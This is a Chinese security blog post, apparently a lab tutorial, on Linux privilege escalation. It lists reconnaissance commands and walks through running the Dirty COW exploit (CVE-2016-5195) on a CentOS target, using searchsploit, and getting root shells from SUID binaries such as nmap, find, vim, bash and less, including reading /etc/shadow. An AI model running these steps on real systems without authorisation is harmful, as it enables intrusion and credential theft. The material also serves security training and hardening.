<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <title>Linux提权（一） | WLSMILE Blog</title>
  <meta name="keywords" content=" 提权 , Linux ">
  <meta name="description" content="Linux提权（一） | WLSMILE Blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="CVE-2020-1472 2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程">
<meta name="keywords" content="漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="域内提权CVE-2020-1472">
<meta property="og:url" content="https://luckdogiii.github.io/2020/12/01/14/index.html">
<meta property="og:site_name" content="WLSMILE Blog">
<meta property="og:description" content="CVE-2020-1472 2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/1.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/2.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/3.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/4.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/5.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/6.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/7.png">
<meta property="og:updated_time" content="2020-12-03T08:51:28.580Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="域内提权CVE-2020-1472">
<meta name="twitter:description" content="CVE-2020-1472 2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程">
<meta name="twitter:image" content="https://luckdogiii.github.io/images/14/1.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0"></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js"></script>

<script src="/js/iconfont.js?v=1.1.0"></script>

</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value>
  <input class="theme_blog_path" value>
  <input id="theme_shortcut" value="true">
</div>


<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>WLSMILE</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=1102528985&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
        <a title="kugou" href="https://www.kugou.com/" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-kugou"></use>
                </svg>
            
        </a>
        
    
        
        <a title="neteasemusic" href="https://music.163.com/#/user/home?id=88151013" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-neteasemusic"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active" data-rel="All">All<small>(14)</small></div></li>
    
        
            
            <li><div data-rel="Linux">Linux<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Web安全">Web安全<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="其他">其他<small>(5)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="内网">内网<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="工具">工具<small>(1)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a class="about  hasFriend  site_url"  href="/about">About</a><a style="width: 50%"  class="friends">Friends</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="14">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" />
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql server</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sqlmap</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代理 password:klforever.cn</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网渗透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>提权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞利用</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞复现</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>端口信息</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        <a  class="All 内网 "
           href="/2020/12/01/14/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="域内提权CVE-2020-1472">域内提权CVE-2020-1472</span>
            <span class="post-date" title="2020-12-01 21:18:55">2020/12/01</span>
        </a>
        
        <a  class="All 内网 "
           href="/2020/11/30/13/"
           data-tag="内网渗透,代理"
           data-author="" >
            <span class="post-title" title="内网穿透-FRP流量改造">内网穿透-FRP流量改造</span>
            <span class="post-date" title="2020-11-30 20:16:00">2020/11/30</span>
        </a>
        
        <a  class="All 内网 "
           href="/2020/09/29/12/"
           data-tag="内网渗透"
           data-author="" >
            <span class="post-title" title="内网渗透之平台搭建">内网渗透之平台搭建</span>
            <span class="post-date" title="2020-09-29 18:46:12">2020/09/29</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/11/06/11/"
           data-tag="漏洞利用,端口信息"
           data-author="" >
            <span class="post-title" title="端口信息及漏洞利用总结（转）">端口信息及漏洞利用总结（转）</span>
            <span class="post-date" title="2019-11-06 20:22:31">2019/11/06</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/10/15/10/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="致远 OA A8远程Getshell">致远 OA A8远程Getshell</span>
            <span class="post-date" title="2019-10-15 16:55:26">2019/10/15</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/10/15/9/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="泛微OA远程代码执行">泛微OA远程代码执行</span>
            <span class="post-date" title="2019-10-15 16:46:35">2019/10/15</span>
        </a>
        
        <a  class="All Web安全 "
           href="/2019/10/14/8/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（三）">SQL SERVER 注入（三）</span>
            <span class="post-date" title="2019-10-14 19:13:59">2019/10/14</span>
        </a>
        
        <a  class="All Web安全 "
           href="/2019/10/11/7/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（二）">SQL SERVER 注入（二）</span>
            <span class="post-date" title="2019-10-11 21:09:17">2019/10/11</span>
        </a>
        
        <a  class="All Web安全 "
           href="/2019/10/11/6/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（一）">SQL SERVER 注入（一）</span>
            <span class="post-date" title="2019-10-11 10:28:47">2019/10/11</span>
        </a>
        
        <a  class="All Linux "
           href="/2019/10/09/5/"
           data-tag="提权,Linux"
           data-author="" >
            <span class="post-title" title="Linux提权（二）">Linux提权（二）</span>
            <span class="post-date" title="2019-10-09 20:10:07">2019/10/09</span>
        </a>
        
        <a  class="All Linux "
           href="/2019/10/09/4/"
           data-tag="提权,Linux"
           data-author="" >
            <span class="post-title" title="Linux提权（一）">Linux提权（一）</span>
            <span class="post-date" title="2019-10-09 08:31:52">2019/10/09</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/10/08/2/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="phpstudy远程代码执行复现">phpstudy远程代码执行复现</span>
            <span class="post-date" title="2019-10-08 20:31:10">2019/10/08</span>
        </a>
        
        <a  class="All 工具 "
           href="/2019/10/08/1/"
           data-tag="sqlmap"
           data-author="" >
            <span class="post-title" title="SQLMAP使用总结">SQLMAP使用总结</span>
            <span class="post-date" title="2019-10-08 15:13:47">2019/10/08</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/09/11/3/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="RDP漏洞CVE-2019-0708复现">RDP漏洞CVE-2019-0708复现</span>
            <span class="post-date" title="2019-09-11 20:13:47">2019/09/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-4" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Linux提权（一）</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="Linux">Linux</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color3">提权</a>
            
            <a class="color1">Linux</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2019-10-09 08:46:12'>2019-10-09 08:31</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#信息收集"><span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#内核，操作系统和设备信息"><span class="toc-text">内核，操作系统和设备信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#用户和群组"><span class="toc-text">用户和群组</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#用户和权限信息："><span class="toc-text">用户和权限信息：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#环境信息"><span class="toc-text">环境信息</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#内核漏洞exp提权"><span class="toc-text">内核漏洞exp提权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#脏牛漏洞本地提权"><span class="toc-text">脏牛漏洞本地提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#内核漏洞提权"><span class="toc-text">内核漏洞提权</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SUID提权"><span class="toc-text">SUID提权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Nmap"><span class="toc-text">Nmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Find"><span class="toc-text">Find</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Vim"><span class="toc-text">Vim</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bash"><span class="toc-text">Bash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less"><span class="toc-text">Less</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="内核，操作系统和设备信息"><a href="#内核，操作系统和设备信息" class="headerlink" title="内核，操作系统和设备信息"></a>内核，操作系统和设备信息</h2><pre><code>uname -a    打印所有可用的系统信息
uname -r    内核版本
uname -n    系统主机名
uname -m    查看系统内核架构（64位/32位）
hostname    系统主机名
cat /proc/version    内核信息
cat /etc/*-release   分发信息
cat /etc/issue       分发信息
cat /proc/cpuinfo    CPU信息
</code></pre><h2 id="用户和群组"><a href="#用户和群组" class="headerlink" title="用户和群组"></a>用户和群组</h2><pre><code>cat /etc/passwd     列出系统上的所有用户
cat /etc/group      列出系统上的所有组
grep -v -E &quot;^#&quot; /etc/passwd | awk -F: &#39;$3 == 0 { print $1}&#39;
                    列出所有的超级用户账户
whoami              查看当前用户
w                   谁目前已登录，他们正在做什么
last                最后登录用户的列表
lastlog             所有用户上次登录的信息
lastlog –u %username%  有关指定用户上次登录的信息
lastlog |grep -v &quot;Never&quot;  以前登录用户的完整列表
</code></pre><h2 id="用户和权限信息："><a href="#用户和权限信息：" class="headerlink" title="用户和权限信息："></a>用户和权限信息：</h2><pre><code>whoami        当前用户名
id            当前用户信息
cat /etc/sudoers  谁被允许以root身份执行
sudo -l       当前用户可以以root身份执行操作
</code></pre><h2 id="环境信息"><a href="#环境信息" class="headerlink" title="环境信息"></a>环境信息</h2><pre><code>env        显示环境变量
set        现实环境变量
echo %PATH 路径信息
history    显示当前用户的历史命令记录
pwd        输出工作目录
cat /etc/profile   显示默认系统变量
cat /etc/shells    显示可用的shell
</code></pre><p>更多参考 -&gt; <a href="https://www.rebootuser.com/?p=1623" target="_blank" rel="noopener">https://www.rebootuser.com/?p=1623</a></p>
<h1 id="内核漏洞exp提权"><a href="#内核漏洞exp提权" class="headerlink" title="内核漏洞exp提权"></a>内核漏洞exp提权</h1><h2 id="脏牛漏洞本地提权"><a href="#脏牛漏洞本地提权" class="headerlink" title="脏牛漏洞本地提权"></a>脏牛漏洞本地提权</h2><p><strong>漏洞描述：</strong><br>漏洞编号：CVE-2016-5195<br>漏洞名称：脏牛（Dirty COW）<br>漏洞危害：低权限用户利用该漏洞技术可以在全版本上实现本地提权<br>影响范围：Linux kernel &gt;=2.6.22  并且Android也受影响</p>
<p><strong>脏牛漏洞名称的来源：</strong></p>
<blockquote>
<p>Linux内核的内存子系统在处理写时拷贝（Copy-on-Write)时存在条件竞争漏洞，导致可以破坏私有只读内存映射。<br>一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限，有可能进一步导致提权漏洞</p>
</blockquote>
<p><strong>漏洞原理:</strong></p>
<blockquote>
<p>该漏洞具体为，get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中，可能产出竞态条件造成COW过程被破坏，导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的。</p>
</blockquote>
<p><strong>漏洞复现过程：</strong><br>靶机：CentOS 6.5<br>1.查看linux内核版本是否大于等于2.6.22<br><code>uname -a</code><br>2.上传POC至 /tmp 目录下（tmp目录具有较高权限）<br><img src="/images/4/1.png" alt><br>3.对dirty.c进行gcc编译生成一个可执行文件</p>
<pre><code>gcc -pthread dirty.c -o dirty -lcrypt
 ***       
 -pthread会附加一个宏定义-D_REENTRANT该宏会导致libc头文件选择那些thread-safe的实现
 -o  为编译后输出的文件名
 ***
</code></pre><p><img src="/images/4/2.png" alt></p>
<p>4.运行dirty可执行文件进行本地提权<br><code>./dirty passwd</code><br>这个漏洞的执行时间将近三分钟，耐心等待之后即可出现<br><img src="/images/4/3.png" alt></p>
<p>此时切换到firefart用户，密码为123456<br><img src="/images/4/4.png" alt><br>执行 id 命令后可以看到已经时root用户了，成功提权。</p>
<h2 id="内核漏洞提权"><a href="#内核漏洞提权" class="headerlink" title="内核漏洞提权"></a>内核漏洞提权</h2><p>如果linux内核版本小于2.6.22或者脏牛无法成功时，我们需要查看其他版本的内核漏洞。这时我们就用到了kali linux，自身所拥有的searchspolit可以帮助我们查看各种linux发行版本的漏洞。而searchs<br>polit的使用也很简单，只需要在后面跟上限定条件即可。<br>查看linux 的漏洞<br><code>searchspolit linux</code><br><img src="/images/4/5.png" alt><br>查看centos6的漏洞<br><code>searchspolit centos 6</code><br><img src="/images/4/6.png" alt><br>通常所用的是查看指定内核版本和linux的发行版本。如：<br><code>searchspolit centos 7 kernel 3.10</code><br><img src="/images/4/7.png" alt><br>所限定的条件越多，当然可利用的漏洞也就越少。我们选中其中符合靶机环境的漏洞后进行查看。<br>利用leafpad命令查看文档内容并且复制到靶机上生成相应的文件。（漏洞的利用虽然是英文，但是一定要看一下使用方法）<br><code>leafpad /usr/share/exploitdb/exploits/linux/dos/41350.c</code><br><img src="/images/4/8.png" alt><br>更多关于searchspolit可以浏览   –&gt; <a href="https://xz.aliyun.com/t/2860" target="_blank" rel="noopener">https://xz.aliyun.com/t/2860</a></p>
<h1 id="SUID提权"><a href="#SUID提权" class="headerlink" title="SUID提权"></a>SUID提权</h1><p>suid含义：</p>
<blockquote>
<p>SUID（设置用户ID）是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。那么，为什么要给Linux二进制文件设置这种权限呢？其实原因有很多，例如，程序ping需要root权限才能打开网络套接字，但执行该程序的用户通常都是由普通用户，来验证与其他主机的连通性</p>
</blockquote>
<p>suid提权：</p>
<blockquote>
<p>那么什么是suid提权呢？我理解的就是有个文件，它有s标志，并且他输入root，那么我们运行这个程序就可以有了root的权限，并且这个程序还得能执行命令，不然没什么用处，那么我们就能从普通用户提升到了root权限了。</p>
</blockquote>
<p>首先在本地查找符合条件的文件</p>
<pre><code>find / -user root -perm -4000 -print 2&gt;/dev/null
find / -perm -u=s -type f 2&gt;/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
</code></pre><p><img src="/images/4/9.png" alt><br>所列出来的文件都是以root用户权限来执行的，接下来找到可以提权的文件。</p>
<p>常见的可用于suid提权的命令</p>
<pre><code>Nmap
Vim
find
Bash
More
Less
Nano
cp
</code></pre><h2 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h2><p>较旧版本的Nmap（2.02至5.21）带有交互模式，从而允许用户执行shell命令。由于Nmap位于上面使用root权限执行的二进制文件列表中，因此可以使用交互式控制台来运行具有相同权限的shell。）<br>可以使用下命令进入namp交互模式<br><code>nmap --interactive</code></p>
<p>执行命令之后会返回一个shell</p>
<pre><code>namp&gt; !sh
sh-3.2# whoami
root
</code></pre><p><img src="/images/4/10.png" alt><br>在Metasploit中也有一个模块可以通过SUID Namp进行提权<br><code>exploit/unix/local/setuid_nmap</code></p>
<h2 id="Find"><a href="#Find" class="headerlink" title="Find"></a>Find</h2><p>如果find以SUID权限运行，所有通过find执行的命令都会以root权限运行。</p>
<pre><code>touch test
find test -exec whoami \;
</code></pre><h2 id="Vim"><a href="#Vim" class="headerlink" title="Vim"></a>Vim</h2><p>Vim的主要用途是用作文本编辑器。 但是，如果以SUID运行，它将继承root用户的权限，因此可以读取系统上的所有文件。<br><code>vim /etc/shadow</code></p>
<p><img src="/images/4/11.png" alt></p>
<h2 id="Bash"><a href="#Bash" class="headerlink" title="Bash"></a>Bash</h2><p>以下命令将以root身份打开一个bash shell。</p>
<pre><code>bash -p
bash-3.2# id
</code></pre><h2 id="Less"><a href="#Less" class="headerlink" title="Less"></a>Less</h2><p>程序Less也可以执行提权后的shell。同样的方法也适用于其他许多命令</p>
<pre><code>less /etc/passwd
!/bin/sh
</code></pre>
      
       
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 wlsmile
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
